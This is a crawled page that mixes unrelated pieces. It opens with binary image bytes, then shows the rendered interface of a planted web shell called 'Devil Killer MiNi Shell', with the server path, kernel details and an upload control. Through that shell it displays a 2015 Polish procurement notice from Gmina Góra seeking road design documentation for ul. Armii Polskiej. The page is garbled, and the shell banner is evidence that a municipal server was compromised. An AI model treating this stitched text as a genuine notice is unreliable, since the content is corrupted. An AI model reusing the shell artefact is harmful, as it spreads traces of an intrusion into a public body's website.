JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150310/33343-N-2015.html

<p class="kh_header"><b>Góra: Opracowanie dokumentacji projektowo- kosztorysowej dla następujących zadań inwestycyjnych:
Przebudowa drogi ul. Armii Polskiej w Górze
Wymiana nawierzchni drogi i przebudowa parkingu przy ul. Armii Polskiej w m. Góra - II etap</b><br>
<b>Numer ogłoszenia: 33343 - 2015; data zamieszczenia: 10.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo- kosztorysowej dla następujących zadań inwestycyjnych:
Przebudowa drogi ul. Armii Polskiej w Górze
Wymiana nawierzchni drogi i przebudowa parkingu przy ul. Armii Polskiej w m. Góra - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo- kosztorysowej dla następujących zadań inwestycyjnych:
Część 1  Przebudowa drogi ul. Armii Polskiej w Górze

Lokalizacja inwestycji:

Projekt objęty niniejszym wnioskiem jest realizowany na terenie miasta Góra . Planowana inwestycja rozpoczyna się na projektowanym skrzyżowaniu z ul. Mickiewicza, a kończy się na istniejącym skrzyżowaniu z ulicą Łąkową .
Planowana droga jest drogą gminną przebiegającą w granicach miasta Góra .

Projektowany zakres :
Opracowanie dokumentacji i uzyskanie uzgodnień branżowych dotyczących zaprojektowanej : drogi klasy L , konstrukcja jezdni wg kategorii ruchu KR-2 o nawierzchni asfaltowej szer. do 5.0 m , należy uwzględnić ściek z kostki wibroprasowanej szarej o szer. 30 cm  , jednostroony  chodnik o nawierzchni asfaltowej, zjazdy na posesje o szer. 3,00-5,00 m nawierzchnia asfaltowa ,  włączenie do dróg gminnych ul. Mickiewicza i Łąkowej , kanalizacji deszczowej , oświetlenia ulicznego oraz przebudowa istniejącego oświetlenia ulicznego na włączeniu ulic Mickiewicza i Armii Polskiej , projektu stałej organizacji ruchu (oznakowanie pionowe i poziome), projektu tymczasowej organizacji ruchu na czas realizacji zadania w Zespole Uzgadniania Dokumentacji Projektowych oraz w jednostkach zarządzających sieciami urządzeń obcych i ruchem drogowym. 
Długość ww drogi wynosi około 0,600 km .
Należy uwzględnić zastosowanie rozwiązań standardowych skutkujących optymalizacją kosztów.


Realizacja przedmiotu zamówienia obejmuje:
a)	wykonanie dokumentacji geodezyjnej i geotechnicznej ,  
b)	opracowanie dokumentacji projektowej wraz z wszelkimi niezbędnymi opiniami, uzgodnieniami oraz specyfikacjami technicznymi wykonania i odbioru robót, przedmiarami robót i kosztorysami inwestorskimi ,
c)	opracowanie wniosku i złożenie w imieniu zamawiającego o wydanie niezbędnej decyzji administracyjnej umożliwiającej realizację zadania , 

Wykonawca w ramach niniejszego zamówienia zobowiązany jest wykonać:

A. Dokumentacja geodezyjna i geotechniczna:
mapa do celów projektowych w skali 1:500 , 					
mapa stanu prawnego z aktualnymi wypisami z rejestru gruntów ,	 	
dokumentacja geotechniczna  wersja papierowa szt. 3 ,
pomiary poprzeczne co 25 mb oraz inwentaryzacja pasa drogowego ul. Armii Polskiej ,
				
B. Opracowanie dokumentacji projektowej powinno obejmować:

Projekt budowlany 7 egz. w wersji papierowej (wg branży) ,		
Projekt wykonawczy wykonany w 7 egz. w wersji papierowej ,			
specyfikacje techniczne wykonania i odbioru robót - 3 egz. w wersji papierowej ,
przedmiary, kosztorysy ślepe i kosztorysy inwestorskie( odrębnie dla drogi i chodnika) - 3 egz. w wersji papierowej ,  
uzgodnienie ZUD ,								 
decyzja o środowiskowych uwarunkowaniach zgody na realizację inwestycji ( jeżeli jest wymagana) ,							 
projekt budowlano-wykonawczy - 7 egz. w wersji papierowej dotyczący sposobu rozwiązań odwodnienia drogi wraz z chodnikiem i uzgodnienie odwodnienia wg warunków wydanych na podstawie wniosku złożonego przez Wykonawcę w firmie  Technika Komunalna TEKOM Sp. z o.o. w Górze ul. Podwale 12  , 
projekt budowlano-wykonawczy - 7 egz. w wersji papierowej dotyczący sposobu odbudowy rowów i 5 przepustów przez drogę i uzgodnienie wg warunków wydanych na podstawie wniosku złożonego w Urzędzie Miasta i Gminy w Górze - Wydział Gospodarki Komunalnej  , ul. Mickiewicza 1 , 56-200 Góra ,
projekt budowlano-wykonawczy - 7 egz. w wersji papierowej dotyczący oświetlenia ulicznego stosownie do drogi tego typu . Oświetlenie hybrydowe .
projekt   budowlano  -  wykonawczy  -  7 egz.   w  wersji   papierowej   branży   energetycznej  ( istniejące oświetlenie uliczne ) ze względu na  kolizję przy włączeniu nowoprojektowanej ul. Armii Polskiej do ul. Mickiewicza ,
uzyskanie pozwolenia konserwatorskiego na ratownicze badania archeologiczne - przed uzyskaniem pozwolenia na budowę ,
projekt tymczasowej organizacji ruchu zatwierdzony przez Starostwo Powiatowe w Górze - 4 egz. wersja papierowa ,
projekt stałej organizacji ruchu wraz z decyzją zatwierdzającą - 4 egz. wersja papierowa , 
raportu o oddziaływaniu na środowisko ( jeżeli stanie się niezbędny) 2 egz. wersja papierowa,
wykonanie  operatu  wodno -  prawnego  i  uzyskanie  pozwolenia  wodno-prawnego  2 egz. wersja papierowa ( jeżeli stanie się niezbędny ),		
projekt wycinki drzew wraz z wymaganymi uzgodnieniami i decyzjami ( jeżeli wystąpi taka potrzeba), 3 egz. w wersji papierowej ,
wyrównanie terenu wokół chodnika humusem oraz wsianie trawy ,
Opracowania informacji dotyczącej bezpieczeństwa i ochrony zdrowia ( BiOZ ) - 2 egz.	 
inne niezbędne do realizacji uzgodnienia, zgody i zatwierdzenia			
  
 
Przygotowanie dokumentacji w wersji elektronicznej na nośniku CD w formacie PDF, umożliwiającej opublikowanie zamówienia publicznego w Internecie - 2 szt. CD.
 



Część 2 Wymiana nawierzchni drogi i przebudowa parkingu przy ul. Armii Polskiej w m. Góra - II etap 


Lokalizacja inwestycji 

Projekt objęty niniejszym wnioskiem jest realizowany na terenie miasta Góra . Planowana inwestycja rozpoczyna się na istniejącym skrzyżowaniu ul. Starogórskiej z ul. Armii Polskiej , a kończy się na istniejącym skrzyżowaniu z ulicą Mickiewicza dz. nr 1871 , na wysokości wieży ciśnień istniejące rozgałęzienie dróg należy również ująć w tym zadaniu dz. nr 2059 i łączy się z ul. Mickiewicza . 
Planowana droga jest drogą gminną przebiegającą w granicach miasta Góra . 

Projektowany zakres 


Opracowanie dokumentacji wykonania nowej nawierzchni asfaltowej na ul. Armii Polskiej : droga klasy L , po dokonaniu wizji lokalnej i pomiarów poprzecznych jeżeli zaistnieje potrzeba należy przyjąć warstwę wyrównawczą np. 2-3 cm a następnie nową warstwę ścieralną o gr. 4 cm , należy uwzględnić ściek z kostki wibroprasowanej szarej o szer. 30 cm , projektu stałej organizacji ruchu (oznakowanie pionowe i poziome) na wysokości Domu Kultury należy przyjąć przejście dla pieszych z kostki betonowej  w  kolorze biało - czerwonym i wyniesionym ponad poziom ulicy 10-12 cm ( jako najazdowe ) , projektu tymczasowej organizacji ruchu na czas realizacji zadania .
Przebudowa parkingu  bez zmiany lokalizacji o nawierzchni z kostki betonowej gr. 8 cm koloru szarego z uwzględnieniem miejsca postojowego dla osoby niepełnosprawnej . 
Długość w w drogi wynosi około 0,650 km .
Należy uwzględnić zastosowanie rozwiązań standardowych skutkujących optymalizacją kosztów.


 Realizacja przedmiotu zamówienia obejmuje:

d)	wykonanie mapy do celów opiniodawczych ,  
e)	opracowanie dokumentacji projektowej do zgłoszenia wykonania nowej nawierzchni ulicy i przebudowy parkingu , specyfikacje techniczne wykonania i odbioru robót, przedmiar robót i kosztorys inwestorski ,


Wykonawca w ramach niniejszego zamówienia zobowiązany jest wykonać:


A. Dokumentacja geodezyjna :
mapa do celów opiniodawczych w skali 1:500 , 					
pomiary poprzeczne co 25 mb oraz inwentaryzacja pasa drogowego ul. Armii Polskiej ,
			
	
B. Opracowanie dokumentacji projektowej powinno obejmować:

	Projekt budowlany 7 egz. w wersji papierowej (wg branży) ,		
Projekt wykonawczy wykonany w 7 egz. w wersji papierowej ,			
specyfikacje techniczne wykonania i odbioru robót - 3 egz. w wersji papierowej ,
przedmiary, kosztorysy  ślepe i kosztorysy inwestorskie - 3 egz. w wersji papierowej ,  
projekt tymczasowej organizacji ruchu zatwierdzony przez Starostwo Powiatowe w Górze - 4 egz. wersja papierowa ,
projekt stałej organizacji ruchu wraz z decyzją zatwierdzającą - 4 egz. wersja papierowa , 
Opracowania informacji dotyczącej bezpieczeństwa i ochrony zdrowia ( BiOZ ) - 2 egz.	 
	
Przygotowanie dokumentacji w wersji elektronicznej na nośniku CD w formacie PDF, umożliwiającej opublikowanie zamówienia publicznego w Internecie - 2 szt. CD.


Obowiązki projektanta dotyczące zadań:


Przedmiot umowy zostanie wykonany zgodnie z obowiązującymi przepisami, w szczególności:
a)	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. z 2010 r. Nr 243, poz. 1623 z p. zm.) 
b)	Ustawą z dnia 21 marca 1985 r. o drogach publicznych.( Dz.U. 1985 nr 14 poz. 60, z późn. zm.)
c)	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. poz. 462).
d)	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126)
e)	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U z 2004 r. Nr 202, poz. 2072 z p. zm.)
f)	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389)
g)	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. 1999 nr 43 poz. 430)
h)	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690 z p. zm.)
i)	ustawą z dnia 29.01.2004r. Prawo zamówień publicznych (Dz. U. Z 2010 r. nr 113, poz. 759, nr 161, z późn. zm.)

Dodatkowe warunki - do obowiązków Wykonawcy należy:


a)	sprawdzenie w terenie warunków wykonania zamówienia,
b)	na bieżąco konsultować z Zamawiającym realizację przedmiotu umowy, Zamawiający zastrzega sobie prawo zgłaszania uwag i sugestii dotyczących rozwiązań projektowych, które Wykonawca zobowiązuje się w dopuszczalnym stopniu i z należytą starannością uwzględnić,
c)	konsultacje z Zamawiającym na każdym etapie opracowania dokumentacji, dotyczące istotnych, mających wpływ na koszty elementów, tj. rozwiązań funkcjonalnych, materiałowych, przy jednoczesnym założeniu, że zaproponowane rozwiązania i materiały zapewnią optymalizację kosztów,
Poszczególne egzemplarze dokumentacji winne być złożona zgodnie z numerami w trwałych teczkach tekturowych z nazwą inwestycji i spisem zawartości teczki od 1 do 7 egz. . ( np. teczka z rączką na zamek np. A4/50 mm wykonana z tektury bądź z innego trwałego materiału ) .
 


UWAGA : 


	Koncepcję poszczególnych zadań inwestycyjnych w formie papierowej należy przedstawić Zamawiającemu celem jego zatwierdzenia przed ostatecznym opracowaniem całości dokumentacji .
Wykonawca projektów ma bezwzględny obowiązek sprawdzenia rzędnych wysokościowych terenu i porównania ich z projektowanymi rzędnymi zawartymi na profilu i przekrojach.
	Dokonać wizji lokalnej w terenie .




Całość dokumentacji należy przekazać w wersji elektronicznej w formacie PDF na płycie CD - 2 egz.

W ramach rękojmi i gwarancji Wykonawca będzie zobowiązany  do:
 - jednorazowej  aktualizacji kosztorysów  inwestorskich ( odrębnie dla każdego z etapów - wg. wskazań Zamawiającego )  w terminie wskazanym przez Zamawiającego. Termin wykonania  14 dni od daty przesłania stosownego pisma Zamawiającego za pomocą faxu lub poczty elektronicznej,
- wyjaśniania i/lub wprowadzania zmian na etapie postępowania o udzielenie zamówienia publicznego w terminach i na zasadach opisanych w projekcie umowy,

-	uzupełniania szczegółów dokumentacji projektowej, wyjaśniania wykonawcy robót budowlanych wątpliwości  powstałych w toku realizacji tych robót bądź udzielania wyjaśnień dot. dokumentacji w trakcie ogłoszenia przetargu na wykonanie robót.
- udzielania w terminie wskazanym przez Zamawiającego wyjaśnień odpowiedzi za pośrednictwem Zamawiającego potencjalnym oferentom, uczestniczącym w postępowaniu o udzielenie zamówienia publicznego, w którym przedmiotowa dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót stanowią opis przedmiotu zamówienia lub wprowadzenia zmian w dokumentacji, jeżeli konieczność ich wprowadzenia wynika z winy Wykonawcy,
Termin wykonania 3 dni od daty przesłania treści zapytań Wykonawców i/lub informacji wskazujących na konieczność wprowadzenia zmian za pomocą faxu lub poczty elektronicznej.
- wprowadzić zmiany w dokumentacji na etapie wykonawstwa , jeżeli konieczność ich wprowadzenia wynika z przyczyn leżących po stronie Wykonawcy.

Powyższe materiały należy przekazać Zamawiającemu również na nośniku elektronicznym , z zastrz. iż przedmiary winny być również udostępnione w odrębnym od kosztorysu pliku pdf .


Przedmiot zamówienia winien być wykonany  zgodnie z obowiązującymi przepisami prawa w zakresie wystarczającym do zgłoszenia robót i przeprowadzenia procedury o udzielenie zamówienia publicznego w trybie ustawy Prawo zamówień publicznych ( tekst jednolity Dz. U. z 2013 r., poz. 907 z późn. zm.  ).
Wykonawca przy opracowywaniu dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót, które następnie służyć będzie jako opis przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego zobowiązany jest do stosowania się do zapisów art. 29 i 30 ustawy Prawo zamówień publicznych . Zastosowane materiały i urządzenia nie mogą być opisane przez wskazanie znaków towarowych, patentów lub pochodzenia, a wskazane muszą zawierać zapis lub równoważne.
Przy użyciu zapisów: dopuszcza się rozwiązania równoważne projektant załączy do dokumentacji kartę rozwiązań równoważnych, w której opisuje możliwie dokładnie kryteria parametry decydujące o równoważności.
Wykonawca wykona przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisami prawa w szczególności zgodnie z:
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego Dz. U. z 2013 r. poz. 1129.
Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-uzytkowym (Dz. U. Nr 130, poz. 1389).
ustawą Prawo Budowlane ( t.j. Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.).
Ponadto Wykonawca winien opracować dokumentację projektową  w szczegółowości umożliwiającej Zamawiającemu ogłoszenie postępowania przetargowego na realizację zadania z ryczałtowym wynagrodzeniem Wykonawcy robót budowlanych. W tym przypadku przedmiar ma charakter wyłącznie uzupełniający i Zamawiający nie jest zobligowany do przekazania go Wykonawcy robót budowlanych w ramach SIWZ. Wszelkie informacje dotyczące zakresu i charakteru robót przedmiotowej inwestycji Wykonawca robót budowlanych winien uzyskać  na podstawie dokumentacji projektowej. 

Wykonawca uzyska wszystkie, jeżeli są niezbędne dla opracowania kompletnej dokumentacji projektowej, wymagane prawem i przepisami decyzje administracyjne, warunki techniczne, uzgodnienia konserwatorskie, opinie i uzgodnienia dotyczące przedmiotu zamówienia.

Dokumentacja projektowa lub część stanowiąca umowny przedmiot odbioru powinny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że są wykonane zgodnie z umową, obowiązującymi przepisami techniczno - budowlanymi oraz normami i że zostają wydane w stanie kompletnym z punktu widzenia celu, któremu mają służyć.
Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej, stanowią integralną część przedmiotu odbioru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 110.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  W postępowaniu ustanowiono obowiązek wniesienia wadium  w wysokości   :
- dla części I - 200,00 złotych
- dla części II - 150,00 złotych
2. Wadium wnosi się przed upływem terminu na  składanie ofert. 
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
 -  pieniądzu ( przelewem na konto  ),
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
- gwarancjach bankowych,
-  gwarancjach ubezpieczeniowych, 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007 r.,Nr 42, poz. 275)
4.	Jeżeli wykonawca wnosi wadium w formie innej niżeli pieniądz, załącza do oferty kopię dokumentu wadialnego, a jego oryginał deponuje w kasie  Zamawiającego przed terminem złożenia ofert, tj. przed 18.03.2015 r. przed godz. 12.00.
Wadium wniesione w pieniądzu należy wpłacić przelewem PKO BP S.A. 45102052260000620204970226
 z dopiskiem wadium w przetargu nieograniczonym na ......................................( nazwa postępowania). 
5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.	Wadium powinno obejmować cały okres związania z ofertą. 
7.	Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto zamawiającego. 
8.	Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
9.	Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy. 
10.	Jeżeli wadium jest wnoszone w formie innej niżeli pieniądz , - zapisy dokumentu wadialnego winny zabezpieczać w pełni interes Zamawiającego w zakresie sytuacji zatrzymania wadium , opisanych w ustawie Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, iż w badanym okresie, tj. w okresie ostatnich trzech lat przed upływem terminu   
w sposób należyty przynajmniej dwie dokumentacje  projektowe w branży drogowej.
4.1.1 Zgodnie z art. 26 ust. 2 b Wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia . 
Korzystając z legitymacji, zawartej w § 1 ust. 6 pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19.02.2013 r., poz. 231) Zamawiający w takim przypadku żąda:
dokumentów dotyczących :
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału  innego podmiotu przy wykonywaniu zamówienia. 
Uwaga:
,, Niezależnie od tego, czy wykonawca będzie udowadniał okoliczności dysponowania podmiotu trzeciego tylko przy pomocy jednego dokumentu zawierającego pisemne zobowiązanie podmiotu trzeciego , czy też przy pomocy wielu dokumentów tworzących w całości takie zobowiązanie treść ich powinna bezspornie i jednoznacznie wskazywać na zakres okoliczności, które wymieniono powyżej,,.
Pisemne zobowiązanie =  bezwzględnie wymagana forma oryginału.
,, Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2 b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy ,,.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
